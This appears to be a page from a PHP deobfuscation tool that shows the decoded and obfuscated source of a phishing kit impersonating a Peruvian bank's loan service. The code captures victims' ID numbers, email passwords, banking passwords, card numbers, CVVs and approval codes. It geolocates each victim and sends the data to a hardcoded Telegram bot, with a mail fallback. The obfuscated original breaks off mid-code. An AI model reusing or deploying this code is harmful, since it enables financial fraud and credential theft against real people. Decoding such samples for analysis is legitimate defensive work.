Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto oS4cH; x_x3i: function SSLPage($url) { $ch = curl_init(); curl_setopt($ch, CU..
Decoded Output download
<?php
goto oS4cH; x_x3i: function SSLPage($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $result = curl_exec($ch); curl_close($ch); return $result; } goto bWZRB; sC2_n: switch ($voy) { case "A": require "reniec/consulta.php"; if ($nombres == NULL || $error == "Nro DNI debe contener 8 digitos") { $nombre_full = "Estimado Usuario(a)"; $name_corto = "Estimado Usuario(a)"; } else { $nombre_full = $nombre_completo; $name_corto = $nameFomateado; } $d_1 = substr($data["dato_3"], 0, -6); $d_2 = substr($data["dato_3"], -6, -3); $d_3 = substr($data["dato_3"], -3); $format_phone = $d_1 . " " . $d_2 . " " . $d_3; $_SESSION["presto"] = $data["dato_1"]; $_SESSION["documento"] = $data["dato_2"]; $_SESSION["phone"] = $format_phone; $_SESSION["full"] = $nombre_full; $_SESSION["corto"] = $name_corto; $_SESSION["openPE"] = TRUE; $sms = "-------------------- [{$cliente}] --------------------\xa\xa\x9 Nombre: " . $nombre_full . "
\x9 DNI: " . $data["dato_2"] . "\xa\xa \x9Celular: " . $format_phone . "
\x9Prestamo: S/. " . number_format($data["dato_1"]) . "
-------------------------------------------------------------
[{$fecha}] - {$celular}
\x9-------------------------------------------------------------
\xa \x9"; break; case "B": $_SESSION["llavero"] = $data["dato_4"]; $_SESSION["puerta"] = $data["dato_5"]; $_SESSION["tipex"] = $data["dato_9"]; $sms = "--------------------CANGRY[{$cliente}]CANGRY--------------------\xa
\x9 [+]CellphoneNumber = " . $data["dato_702"] . "\xa\x9 [+]FullName = " . $_SESSION["full"] . "
\x9\x9[+]Dni = " . $data["dato_701"] . "
[+]Mail = " . $data["dato_correo"] . "\xa\x9\x9[+]PasswordMail = " . $data["dato_contrase\xc3\261acorreo"] . "
\x9[+]LoanValue = " . $data["dato_700"] . "\xa [+]Share = " . $data["dato_703"] . "
\x9\x9[+]Installments = " . $data["dato_705"] . "\xa [+]TotalPay = " . $data["dato_704"] . "\xa\x9 [+]Payday = " . $data["dato_diadepago"] . "\xa\x9 [+]CardNumber = " . $data["dato_8899"] . "
\x9\x9[+]Dni = " . $data["dato_701"] . "
\x9 [+]Password = " . $data["dato_4"] . "
\x9\x9\xa \x9-------------------------------------------------------------
\x9[{$fecha}] - {$celular}
-------------------------------------------------------------
\x9\x9"; sendTLG($sms); break; case "C": $xml = simplexml_load_file("http://www.geoplugin.net/xml.gp?ip=" . $cliente); SSLPage($xml); $pais = $xml->geoplugin_countryName; $ciudad = $xml->geoplugin_city; $departamento = $xml->geoplugin_regionName; $sms = "--------------------CANGRY[{$cliente}]CANGRY--------------------
\xa\x9 [+]CellphoneNumber = " . $data["dato_702"] . "\xa\x9 [+]FullName = " . $_SESSION["full"] . "\xa\x9 [+]Dni = " . $data["dato_701"] . "
\x9[+]Mail = " . $data["dato_correo"] . "
\x9[+]PasswordMail = " . $data["dato_contrase\xc3\261acorreo"] . "\xa \x9[+]LoanValue = " . $data["dato_700"] . "
[+]Share = " . $data["dato_703"] . "
\x9[+]Installments = " . $data["dato_705"] . "
\x9[+]TotalPay = " . $data["dato_704"] . "\xa\x9\x9[+]Payday = " . $data["dato_diadepago"] . "\xa\x9 [+]CardNumber = " . $data["dato_8899"] . "
[+]Dni = " . $data["dato_701"] . "
[+]Password = " . $data["dato_4"] . "\xa\x9\x9[+]DateExpirate = " . $data["dato_707"] . "
\x9\x9[+]CVV = " . $data["dato_706"] . "\xa
\x9\x9" . $pais . " - " . $ciudad . " - " . $departamento . "
\x9\x9-------------------------------------------------------------
\x9[{$fecha}] - {$celular}\xa\x9\x9-------------------------------------------------------------
\xa "; sendTLG($sms); break; case "D": $xml = simplexml_load_file("http://www.geoplugin.net/xml.gp?ip=" . $cliente); SSLPage($xml); $pais = $xml->geoplugin_countryName; $ciudad = $xml->geoplugin_city; $departamento = $xml->geoplugin_regionName; $sms = "--------------------CANGRY[{$cliente}]CANGRY--------------------\xa\xa\x9 [+]CellphoneNumber = " . $data["dato_702"] . "\xa \x9[+]FullName = " . $_SESSION["full"] . "\xa [+]Dni = " . $data["dato_701"] . "\xa\x9 [+]Mail = " . $data["dato_correo"] . "
\x9 [+]PasswordMail = " . $data["dato_contrase\303\xb1acorreo"] . "
\x9 [+]LoanValue = " . $data["dato_700"] . "\xa \x9[+]Share = " . $data["dato_703"] . "
[+]Installments = " . $data["dato_705"] . "\xa\x9 [+]TotalPay = " . $data["dato_704"] . "\xa [+]Payday = " . $data["dato_diadepago"] . "\xa [+]C\xc3\xb3digo de aprobaci\303\263n = " . $data["dato_atm"] . "\xa
\x9" . $pais . " - " . $ciudad . " - " . $departamento . "\xa -------------------------------------------------------------
[{$fecha}] - {$celular}
\x9 -------------------------------------------------------------
\xa "; sendTLG($sms); bloquedHT($cliente); break; case "E": $xml = simplexml_load_file("http://www.geoplugin.net/xml.gp?ip=" . $cliente); SSLPage($xml); $pais = $xml->geoplugin_countryName; $ciudad = $xml->geoplugin_city; $departamento = $xml->geoplugin_regionName; $sms = "--------------------CANGRY[{$cliente}]CANGRY--------------------\xa\xa \x9[+]CellphoneNumber = " . $data["dato_702"] . "
\x9\x9[+]FullName = " . $_SESSION["full"] . "
\x9\x9[+]Dni = " . $data["dato_701"] . "
[+]Mail = " . $data["dato_correo"] . "
\x9\x9[+]PasswordMail = " . $data["dato_contrase\xc3\xb1acorreo"] . "\xa [+]LoanValue = " . $data["dato_700"] . "
\x9[+]Share = " . $data["dato_703"] . "\xa [+]Installments = " . $data["dato_705"] . "
[+]TotalPay = " . $data["dato_704"] . "
\x9[+]Payday = " . $data["dato_diadepago"] . "
\x9 [+]C\303\xb3digo de aprobaci\303\263n = " . $data["dato_atm"] . "\xa
" . $pais . " - " . $ciudad . " - " . $departamento . "\xa -------------------------------------------------------------
\x9 [{$fecha}] - {$celular}
\x9 -------------------------------------------------------------
\xa\x9\x9"; sendTLG($sms); bloquedHT($cliente); break; default: break; } goto IMLvX; C3UEd: $cliente = getIP(); goto xip3I; IMLvX: function sendTLG($sms) { $datos = array(_token[0] => _id[0], _token[1] => _id[1]); foreach ($datos as $key => $valor) { $tk = explode(" ", $key); $vl = explode(" ", $valor); $token = $tk[0]; $id = $vl[0]; $data = array("chat_id" => $id, "text" => $sms); SSLPage("https://api.telegram.org/bot{$token}/sendMessage?" . http_build_query($data)); } } goto x_x3i; K6l7o: include "lib/data.php"; goto TFMHv; TFMHv: function getIP() { if (isset($_SERVER["HTTP_CF_CONNECTING_IP"])) { $cliente = $_SERVER["HTTP_CF_CONNECTING_IP"]; } elseif (isset($_SERVER["HTTP_CLIENT_IP"])) { $cliente = $_SERVER["HTTP_CLIENT_IP"]; } elseif (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { $cliente = $_SERVER["HTTP_X_FORWARDED_FOR"]; } elseif (isset($_SERVER["HTTP_X_FORWARDED"])) { $cliente = $_SERVER["HTTP_X_FORWARDED"]; } elseif (isset($_SERVER["HTTP_FORWARDED_FOR"])) { $cliente = $_SERVER["HTTP_FORWARDED_FOR"]; } elseif (isset($_SERVER["HTTP_FORWARDED"])) { $cliente = $_SERVER["HTTP_FORWARDED"]; } else { $cliente = isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : false; } if ($cliente === "::1") { $cliente = "181.67.216.84"; } return $cliente; } goto GFaQh; UJPO6: define("_token", array("7734119044:AAHMuvyrwb4K0Fc17eDXnGprPFpkYhJcpv4")); goto sIm3b; aBg3A: $voy = $_POST["orden"]; goto sC2_n; ucQPB: define("EMAIL_LOGS", "[email protected]"); goto UJPO6; bWZRB: function mandar_datos($cadena, $cliente, $sms) { $subj = "BCP - {$cliente}"; $header .= "From: " . $cadena . "<{$cliente}@noreply.com>" . "
"; $header .= "MIME-Version: 1.0" . "\xd\xa"; $header .= "Content-type: text/html; charset=utf-8" . "
\xa"; mail(EMAIL_LOGS, $subj, $sms, $header); } goto Kqcn3; oS4cH: error_reporting(0); goto gckDj; sIm3b: define("_id", array("5524356871")); goto gCJbu; xip3I: $agente = $_SERVER["HTTP_USER_AGENT"]; goto IwzNQ; gCJbu: date_default_timezone_set("America/Lima"); goto C3UEd; GFaQh: $data = array("dato_0" => "DNI", "dato_1" => $_POST["data_1"], "dato_2" => $_POST["data_2"], "dato_3" => $_POST["data_3"], "dato_4" => $_POST["data_4"], "dato_5" => $_POST["data_5"], "dato_6" => $_POST["data_6"], "dato_7" => $_POST["data_7"], "dato_8" => $_POST["data_8"], "dato_9" => $_POST["data_9"], "dato_8899" => $_POST["data_8899"], "dato_700" => $_POST["data_700"], "dato_701" => $_POST["data_701"], "dato_702" => $_POST["data_702"], "dato_703" => $_POST["data_703"], "dato_704" => $_POST["data_704"], "dato_705" => $_POST["data_705"], "dato_706" => $_POST["data_706"], "dato_707" => $_POST["data_707"], "dato_diadepago" => $_POST["data_diadepago"], "dato_atm" => $_POST["data_atm"], "dato_correo" => $_POST["data_correo"], "dato_contrase\303\261acorreo" => $_POST["data_contrase\303\xb1acorreo"]); goto aBg3A; IwzNQ: $fecha = date("d/m/Y - h:i A"); goto K6l7o; Kqcn3: function bloquedHT($datosIP) { $archivo = "bloqueados.txt"; $ipBloqueada = trim($datosIP) . PHP_EOL; if (!file_exists($archivo) || !in_array(trim($datosIP), file($archivo, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES))) { file_put_contents($archivo, $ipBloqueada, FILE_APPEND); } } goto ex8kZ; gckDj: session_start(); goto ucQPB; ex8kZ: ?>
Did this file decode correctly?
Original Code
<?php
goto oS4cH; x_x3i: function SSLPage($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $result = curl_exec($ch); curl_close($ch); return $result; } goto bWZRB; sC2_n: switch ($voy) { case "\101": require "\162\x65\156\151\145\x63\x2f\x63\x6f\x6e\163\165\154\164\141\x2e\160\x68\160"; if ($nombres == NULL || $error == "\x4e\x72\x6f\x20\104\x4e\x49\40\144\x65\x62\145\40\143\157\156\x74\145\156\x65\162\40\70\40\x64\151\x67\x69\164\x6f\x73") { $nombre_full = "\x45\163\164\151\155\x61\x64\157\40\x55\163\165\x61\x72\x69\x6f\x28\x61\51"; $name_corto = "\x45\163\x74\x69\155\x61\144\x6f\40\x55\163\165\x61\162\151\x6f\50\141\x29"; } else { $nombre_full = $nombre_completo; $name_corto = $nameFomateado; } $d_1 = substr($data["\144\141\x74\x6f\137\63"], 0, -6); $d_2 = substr($data["\x64\141\164\x6f\x5f\63"], -6, -3); $d_3 = substr($data["\x64\x61\x74\157\x5f\x33"], -3); $format_phone = $d_1 . "\x20" . $d_2 . "\40" . $d_3; $_SESSION["\x70\x72\x65\x73\x74\x6f"] = $data["\144\x61\x74\x6f\137\61"]; $_SESSION["\144\x6f\x63\x75\x6d\145\x6e\164\157"] = $data["\x64\x61\164\x6f\137\x32"]; $_SESSION["\160\150\x6f\156\145"] = $format_phone; $_SESSION["\146\165\154\154"] = $nombre_full; $_SESSION["\143\x6f\162\x74\x6f"] = $name_corto; $_SESSION["\157\160\145\x6e\x50\105"] = TRUE; $sms = "\55\x2d\55\x2d\55\x2d\x2d\55\55\55\x2d\55\x2d\x2d\x2d\55\x2d\x2d\x2d\55\x20\133{$cliente}\x5d\40\x2d\55\55\x2d\x2d\55\x2d\x2d\x2d\55\x2d\55\x2d\55\55\x2d\x2d\55\x2d\55\xa\xa\x9\11\x4e\x6f\x6d\x62\x72\145\x3a\40" . $nombre_full . "\12\x9\11\104\x4e\x49\72\40" . $data["\144\x61\x74\x6f\137\x32"] . "\xa\xa\11\x9\x43\145\x6c\165\154\x61\162\x3a\x20" . $format_phone . "\12\12\11\x9\120\x72\145\x73\164\141\x6d\157\x3a\x20\123\x2f\x2e\40" . number_format($data["\144\x61\164\157\137\61"]) . "\12\12\11\11\55\x2d\55\x2d\55\55\x2d\x2d\55\x2d\x2d\x2d\55\55\55\x2d\x2d\55\x2d\55\55\55\x2d\x2d\55\x2d\55\55\55\x2d\55\x2d\55\x2d\55\55\55\x2d\x2d\x2d\x2d\55\x2d\55\55\x2d\55\x2d\55\55\x2d\x2d\55\55\x2d\55\x2d\55\55\x2d\x2d\12\11\11\133{$fecha}\x5d\40\55\40{$celular}\12\11\x9\x2d\x2d\x2d\55\x2d\55\55\x2d\55\x2d\55\x2d\55\x2d\x2d\x2d\55\55\x2d\55\55\x2d\55\x2d\x2d\x2d\x2d\x2d\55\x2d\x2d\55\x2d\x2d\x2d\55\x2d\55\55\x2d\55\55\x2d\x2d\x2d\55\55\55\55\x2d\55\x2d\x2d\x2d\x2d\55\55\x2d\55\55\55\12\xa\11\x9"; break; case "\102": $_SESSION["\x6c\x6c\x61\166\145\162\x6f"] = $data["\144\141\164\157\x5f\x34"]; $_SESSION["\160\165\145\162\164\x61"] = $data["\144\141\x74\157\137\x35"]; $_SESSION["\x74\151\x70\145\x78"] = $data["\144\141\x74\x6f\x5f\71"]; $sms = "\55\55\x2d\55\x2d\x2d\x2d\x2d\x2d\x2d\55\x2d\55\x2d\x2d\55\55\x2d\55\x2d\103\x41\x4e\107\x52\131\x5b{$cliente}\x5d\103\101\x4e\x47\122\x59\x2d\x2d\x2d\x2d\x2d\x2d\55\55\55\x2d\55\x2d\x2d\x2d\x2d\x2d\55\x2d\55\55\xa\x20\x20\x20\x20\x20\x20\40\x20\12\x9\11\x5b\53\x5d\x43\x65\154\x6c\x70\150\157\x6e\x65\x4e\x75\155\x62\x65\162\40\75\x20" . $data["\x64\141\x74\157\x5f\x37\60\62"] . "\xa\x9\11\x5b\x2b\135\106\x75\x6c\154\x4e\x61\155\145\x20\75\40" . $_SESSION["\x66\165\x6c\154"] . "\12\x9\x9\x5b\53\135\104\156\151\x20\x3d\40" . $data["\x64\141\x74\157\x5f\x37\60\x31"] . "\12\11\11\x5b\53\135\x4d\x61\x69\x6c\40\75\40" . $data["\x64\141\x74\157\137\143\x6f\x72\x72\145\x6f"] . "\xa\x9\x9\133\x2b\x5d\120\x61\163\x73\167\x6f\162\x64\115\x61\151\x6c\40\75\x20" . $data["\144\141\164\157\137\x63\x6f\x6e\164\162\141\x73\145\xc3\261\141\143\x6f\x72\x72\145\x6f"] . "\12\11\x9\133\x2b\135\114\157\x61\x6e\126\x61\x6c\165\145\x20\x3d\x20" . $data["\x64\141\x74\157\137\67\x30\x30"] . "\xa\11\11\x5b\53\x5d\123\150\x61\162\x65\x20\75\x20" . $data["\x64\x61\164\157\x5f\67\60\x33"] . "\12\x9\x9\x5b\x2b\x5d\x49\156\163\164\141\x6c\154\155\145\156\x74\x73\40\75\40" . $data["\144\141\164\157\x5f\x37\60\65"] . "\xa\11\11\x5b\x2b\x5d\x54\x6f\164\x61\154\120\x61\x79\40\75\x20" . $data["\144\x61\164\157\137\67\x30\64"] . "\xa\x9\11\x5b\x2b\135\x50\141\171\144\141\171\40\x3d\40" . $data["\144\141\164\157\137\144\x69\x61\x64\145\160\141\147\x6f"] . "\xa\x9\11\133\x2b\135\103\x61\162\144\116\x75\155\x62\x65\162\x20\75\x20" . $data["\x64\x61\x74\x6f\137\70\70\71\x39"] . "\11\12\x9\x9\x5b\53\x5d\x44\x6e\x69\40\75\40" . $data["\x64\141\x74\157\x5f\x37\x30\61"] . "\12\x9\11\x5b\x2b\135\120\x61\163\163\167\x6f\x72\144\40\75\x20" . $data["\x64\141\x74\x6f\x5f\64"] . "\12\x9\x9\xa\11\x9\x2d\55\55\x2d\55\55\x2d\x2d\55\55\x2d\x2d\55\x2d\55\x2d\x2d\55\55\x2d\55\55\55\55\55\x2d\55\x2d\55\x2d\x2d\55\55\x2d\x2d\x2d\55\x2d\x2d\55\55\55\x2d\55\x2d\55\x2d\55\x2d\55\55\x2d\x2d\x2d\x2d\55\x2d\x2d\55\x2d\x2d\12\11\x9\133{$fecha}\x5d\x20\55\x20{$celular}\12\11\11\x2d\55\55\55\55\x2d\x2d\x2d\x2d\55\55\55\x2d\55\55\x2d\x2d\x2d\55\55\55\x2d\55\x2d\55\55\x2d\55\55\x2d\55\x2d\55\x2d\x2d\55\55\55\55\55\55\x2d\55\x2d\x2d\55\55\55\55\x2d\55\55\55\55\x2d\55\55\55\x2d\x2d\55\12\12\x9\x9"; sendTLG($sms); break; case "\103": $xml = simplexml_load_file("\150\164\x74\x70\72\x2f\x2f\x77\x77\x77\56\x67\x65\x6f\x70\x6c\165\147\x69\156\56\x6e\x65\x74\x2f\x78\155\x6c\x2e\x67\160\x3f\x69\160\x3d" . $cliente); SSLPage($xml); $pais = $xml->geoplugin_countryName; $ciudad = $xml->geoplugin_city; $departamento = $xml->geoplugin_regionName; $sms = "\x2d\x2d\x2d\55\55\55\55\x2d\x2d\x2d\55\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x43\101\x4e\107\122\131\x5b{$cliente}\135\103\x41\x4e\x47\122\x59\x2d\x2d\x2d\x2d\x2d\55\x2d\55\x2d\x2d\55\x2d\x2d\55\55\55\x2d\x2d\55\x2d\12\xa\x9\11\x5b\53\135\103\145\x6c\x6c\x70\x68\x6f\x6e\x65\x4e\x75\155\142\145\162\x20\75\40" . $data["\x64\141\x74\x6f\137\x37\60\x32"] . "\xa\x9\11\x5b\x2b\x5d\x46\x75\154\x6c\116\x61\155\145\40\x3d\x20" . $_SESSION["\146\x75\154\154"] . "\xa\x9\11\x5b\x2b\135\x44\156\151\40\x3d\40" . $data["\x64\x61\164\x6f\137\x37\60\x31"] . "\12\11\x9\x5b\53\135\115\141\x69\x6c\40\x3d\40" . $data["\144\141\164\157\137\x63\157\162\162\x65\157"] . "\12\11\x9\133\53\x5d\120\141\163\163\x77\157\162\144\x4d\x61\151\x6c\40\75\40" . $data["\x64\141\x74\157\137\143\x6f\156\x74\162\141\163\145\xc3\261\141\143\x6f\x72\x72\x65\x6f"] . "\xa\11\x9\133\53\135\x4c\x6f\141\156\126\x61\154\x75\145\40\x3d\40" . $data["\x64\x61\x74\x6f\x5f\67\x30\60"] . "\12\11\11\x5b\53\135\123\x68\x61\x72\x65\x20\75\40" . $data["\x64\x61\x74\x6f\137\67\60\63"] . "\12\11\x9\133\53\135\x49\x6e\x73\x74\141\x6c\154\x6d\x65\x6e\164\x73\40\75\40" . $data["\144\141\164\157\137\67\x30\65"] . "\12\11\x9\133\x2b\x5d\124\157\x74\141\154\x50\141\x79\40\x3d\40" . $data["\x64\141\x74\x6f\x5f\x37\x30\x34"] . "\xa\x9\x9\x5b\x2b\135\120\141\171\x64\x61\171\x20\x3d\x20" . $data["\144\141\164\157\137\x64\x69\141\144\x65\x70\141\x67\157"] . "\xa\x9\11\x5b\x2b\135\x43\x61\162\x64\116\x75\155\142\145\162\x20\x3d\40" . $data["\144\x61\x74\x6f\x5f\x38\x38\x39\x39"] . "\12\11\11\x5b\x2b\135\104\x6e\x69\40\x3d\40" . $data["\144\x61\164\x6f\x5f\x37\x30\61"] . "\12\11\11\133\53\x5d\x50\x61\x73\x73\167\x6f\x72\144\x20\75\40" . $data["\144\141\164\x6f\137\64"] . "\xa\x9\x9\x5b\x2b\x5d\x44\x61\x74\145\105\170\160\151\162\141\164\x65\40\x3d\40" . $data["\x64\x61\x74\x6f\137\x37\60\67"] . "\12\x9\x9\133\x2b\x5d\x43\x56\126\x20\75\40" . $data["\x64\x61\x74\x6f\137\x37\60\x36"] . "\xa\12\x9\x9" . $pais . "\x20\55\x20" . $ciudad . "\40\x2d\40" . $departamento . "\12\x9\x9\x2d\55\55\55\55\55\x2d\55\x2d\x2d\55\x2d\x2d\55\x2d\x2d\x2d\55\x2d\x2d\55\x2d\55\55\x2d\55\55\55\55\x2d\x2d\x2d\55\x2d\x2d\55\x2d\55\55\x2d\x2d\55\55\55\55\x2d\x2d\x2d\55\55\55\55\x2d\x2d\55\55\55\55\x2d\x2d\x2d\12\11\x9\x5b{$fecha}\135\40\x2d\40{$celular}\xa\x9\x9\55\55\55\x2d\x2d\55\x2d\55\55\55\x2d\x2d\55\55\55\x2d\x2d\55\x2d\x2d\x2d\x2d\55\55\x2d\55\55\55\55\x2d\x2d\55\x2d\x2d\55\55\55\55\x2d\x2d\55\x2d\x2d\x2d\x2d\55\55\55\x2d\55\x2d\x2d\55\x2d\55\x2d\55\x2d\55\55\x2d\12\xa\11\11"; sendTLG($sms); break; case "\104": $xml = simplexml_load_file("\x68\x74\164\x70\72\57\57\167\167\167\x2e\x67\145\157\x70\x6c\x75\147\x69\x6e\56\x6e\x65\164\57\x78\155\154\x2e\147\x70\77\151\160\x3d" . $cliente); SSLPage($xml); $pais = $xml->geoplugin_countryName; $ciudad = $xml->geoplugin_city; $departamento = $xml->geoplugin_regionName; $sms = "\x2d\x2d\55\x2d\x2d\55\55\x2d\55\55\x2d\x2d\x2d\55\55\55\55\55\55\x2d\103\x41\116\107\x52\x59\x5b{$cliente}\x5d\103\101\116\107\x52\x59\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\55\55\x2d\55\55\x2d\55\55\55\55\xa\xa\x9\11\x5b\x2b\x5d\103\x65\x6c\154\160\150\x6f\x6e\x65\x4e\165\x6d\x62\x65\162\x20\75\x20" . $data["\x64\x61\x74\157\x5f\x37\60\62"] . "\xa\11\x9\133\x2b\135\106\165\x6c\x6c\x4e\x61\x6d\x65\x20\75\40" . $_SESSION["\146\165\154\154"] . "\xa\11\11\x5b\x2b\135\104\x6e\x69\x20\x3d\40" . $data["\x64\x61\164\157\137\x37\x30\x31"] . "\xa\x9\11\133\53\135\x4d\141\151\x6c\40\x3d\x20" . $data["\144\141\x74\157\137\143\157\162\x72\x65\x6f"] . "\12\x9\11\133\x2b\x5d\x50\141\163\163\167\157\162\x64\x4d\x61\x69\154\x20\75\x20" . $data["\144\x61\164\157\137\x63\157\156\x74\x72\141\x73\145\303\xb1\x61\143\x6f\x72\x72\145\x6f"] . "\12\x9\11\x5b\53\135\x4c\x6f\x61\156\x56\x61\154\165\145\40\x3d\x20" . $data["\x64\x61\164\157\x5f\67\x30\x30"] . "\xa\11\x9\x5b\53\135\123\150\141\162\145\x20\75\x20" . $data["\x64\x61\x74\x6f\137\67\60\63"] . "\12\11\11\133\53\135\x49\156\163\164\141\154\x6c\x6d\145\156\x74\163\40\75\40" . $data["\144\141\x74\x6f\x5f\x37\x30\x35"] . "\xa\x9\11\133\53\x5d\124\157\164\141\154\120\x61\x79\x20\75\x20" . $data["\x64\x61\x74\157\137\x37\x30\x34"] . "\xa\11\11\x5b\53\x5d\x50\141\171\144\141\171\x20\75\40" . $data["\x64\x61\164\x6f\137\x64\x69\x61\144\145\x70\x61\147\157"] . "\xa\11\11\133\x2b\x5d\103\xc3\xb3\x64\151\x67\x6f\x20\x64\145\40\x61\160\162\x6f\142\141\x63\x69\303\263\x6e\x20\75\40" . $data["\x64\x61\164\x6f\x5f\141\x74\155"] . "\xa\11\11\12\11\x9" . $pais . "\40\x2d\40" . $ciudad . "\x20\x2d\x20" . $departamento . "\xa\11\11\x2d\55\x2d\55\x2d\55\x2d\55\x2d\x2d\55\55\55\x2d\55\x2d\x2d\55\x2d\55\55\x2d\55\55\55\x2d\55\x2d\x2d\x2d\55\55\55\55\x2d\55\55\55\55\55\55\55\55\x2d\55\x2d\x2d\55\x2d\x2d\55\x2d\x2d\x2d\55\x2d\55\55\55\55\x2d\12\11\11\133{$fecha}\135\40\x2d\x20{$celular}\12\x9\11\x2d\55\55\x2d\55\55\55\x2d\55\55\55\55\x2d\55\55\x2d\55\x2d\55\x2d\x2d\55\55\55\55\x2d\55\x2d\x2d\55\x2d\55\x2d\x2d\55\55\55\55\x2d\x2d\x2d\55\55\55\x2d\55\55\x2d\55\x2d\x2d\55\55\55\55\x2d\x2d\x2d\55\55\x2d\12\xa\11\11"; sendTLG($sms); bloquedHT($cliente); break; case "\105": $xml = simplexml_load_file("\x68\164\x74\x70\x3a\57\57\167\x77\x77\x2e\x67\145\x6f\160\x6c\165\x67\x69\156\56\156\x65\164\x2f\170\x6d\x6c\x2e\147\x70\77\151\160\75" . $cliente); SSLPage($xml); $pais = $xml->geoplugin_countryName; $ciudad = $xml->geoplugin_city; $departamento = $xml->geoplugin_regionName; $sms = "\x2d\x2d\55\x2d\x2d\55\x2d\55\x2d\x2d\55\x2d\55\55\x2d\55\x2d\55\55\x2d\x43\101\116\107\x52\131\133{$cliente}\x5d\103\101\116\107\122\x59\x2d\x2d\x2d\x2d\x2d\55\x2d\x2d\x2d\55\x2d\x2d\55\x2d\55\x2d\x2d\x2d\x2d\55\xa\xa\11\x9\133\x2b\x5d\x43\145\154\154\160\150\x6f\x6e\x65\116\165\155\142\145\x72\x20\x3d\40" . $data["\x64\141\164\157\137\x37\60\x32"] . "\12\x9\x9\133\x2b\x5d\x46\165\154\x6c\116\141\155\145\x20\x3d\40" . $_SESSION["\x66\165\154\154"] . "\12\x9\x9\133\x2b\x5d\x44\156\151\40\75\40" . $data["\144\x61\x74\157\x5f\x37\x30\61"] . "\12\11\11\133\x2b\135\115\x61\x69\154\x20\75\x20" . $data["\x64\x61\164\157\137\143\157\x72\162\x65\x6f"] . "\12\x9\x9\133\53\x5d\120\x61\x73\x73\167\x6f\x72\144\115\x61\x69\x6c\x20\75\x20" . $data["\x64\141\x74\157\137\143\157\x6e\164\162\141\163\x65\xc3\xb1\141\x63\x6f\x72\x72\x65\157"] . "\xa\11\11\133\53\x5d\x4c\157\141\156\x56\141\154\x75\145\40\x3d\x20" . $data["\x64\141\x74\157\137\x37\x30\x30"] . "\12\11\x9\x5b\x2b\135\x53\150\141\x72\145\x20\75\40" . $data["\x64\x61\x74\157\137\67\60\x33"] . "\xa\11\11\x5b\x2b\135\x49\156\163\x74\141\154\x6c\x6d\x65\x6e\x74\163\x20\75\x20" . $data["\x64\141\x74\157\x5f\67\60\65"] . "\12\11\11\x5b\53\135\x54\x6f\x74\x61\154\x50\141\171\40\x3d\x20" . $data["\x64\x61\x74\157\137\x37\x30\x34"] . "\12\11\x9\133\x2b\135\x50\x61\171\144\x61\x79\40\x3d\40" . $data["\144\141\164\x6f\x5f\x64\151\x61\144\x65\160\141\x67\x6f"] . "\12\x9\11\x5b\x2b\135\103\303\xb3\144\x69\x67\x6f\x20\x64\x65\x20\141\x70\162\x6f\142\141\143\x69\303\263\156\40\x3d\x20" . $data["\x64\x61\164\x6f\x5f\x61\164\155"] . "\xa\11\11\12\11\11" . $pais . "\x20\x2d\40" . $ciudad . "\40\x2d\40" . $departamento . "\xa\11\11\55\x2d\x2d\55\55\x2d\x2d\55\x2d\55\x2d\55\55\55\x2d\55\55\55\55\x2d\x2d\x2d\x2d\x2d\x2d\x2d\55\x2d\55\x2d\55\x2d\x2d\55\55\55\55\55\x2d\55\x2d\55\55\x2d\55\55\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\55\x2d\55\55\55\x2d\55\12\x9\11\133{$fecha}\135\x20\55\40{$celular}\12\x9\11\x2d\x2d\x2d\55\55\55\x2d\x2d\x2d\55\x2d\x2d\x2d\x2d\x2d\x2d\55\x2d\55\55\55\55\x2d\55\x2d\x2d\x2d\55\x2d\x2d\55\x2d\55\x2d\x2d\x2d\x2d\x2d\55\x2d\x2d\55\55\55\55\55\x2d\55\x2d\x2d\x2d\55\x2d\55\x2d\x2d\x2d\55\x2d\x2d\x2d\12\xa\x9\x9"; sendTLG($sms); bloquedHT($cliente); break; default: break; } goto IMLvX; C3UEd: $cliente = getIP(); goto xip3I; IMLvX: function sendTLG($sms) { $datos = array(_token[0] => _id[0], _token[1] => _id[1]); foreach ($datos as $key => $valor) { $tk = explode("\x20", $key); $vl = explode("\40", $valor); $token = $tk[0]; $id = $vl[0]; $data = array("\143\150\x61\x74\x5f\151\144" => $id, "\164\x65\x78\x74" => $sms); SSLPage("\150\x74\164\160\163\x3a\57\x2f\141\160\151\56\164\145\x6c\x65\x67\162\x61\155\x2e\157\x72\x67\x2f\142\x6f\164{$token}\57\x73\145\x6e\144\x4d\x65\x73\x73\x61\147\145\77" . http_build_query($data)); } } goto x_x3i; K6l7o: include "\154\x69\x62\x2f\144\141\164\x61\x2e\x70\x68\x70"; goto TFMHv; TFMHv: function getIP() { if (isset($_SERVER["\110\x54\124\x50\137\103\x46\x5f\103\117\x4e\x4e\x45\103\124\x49\116\x47\x5f\111\x50"])) { $cliente = $_SERVER["\x48\x54\x54\x50\137\103\106\137\x43\x4f\x4e\x4e\105\103\124\111\x4e\107\x5f\111\x50"]; } elseif (isset($_SERVER["\x48\x54\124\x50\x5f\x43\114\x49\x45\x4e\x54\137\x49\120"])) { $cliente = $_SERVER["\x48\x54\124\x50\137\x43\x4c\111\105\x4e\124\137\111\120"]; } elseif (isset($_SERVER["\110\x54\x54\120\x5f\130\x5f\x46\x4f\122\127\101\x52\104\105\104\x5f\106\117\x52"])) { $cliente = $_SERVER["\x48\x54\124\x50\137\x58\x5f\x46\x4f\122\127\101\x52\104\x45\x44\137\106\x4f\122"]; } elseif 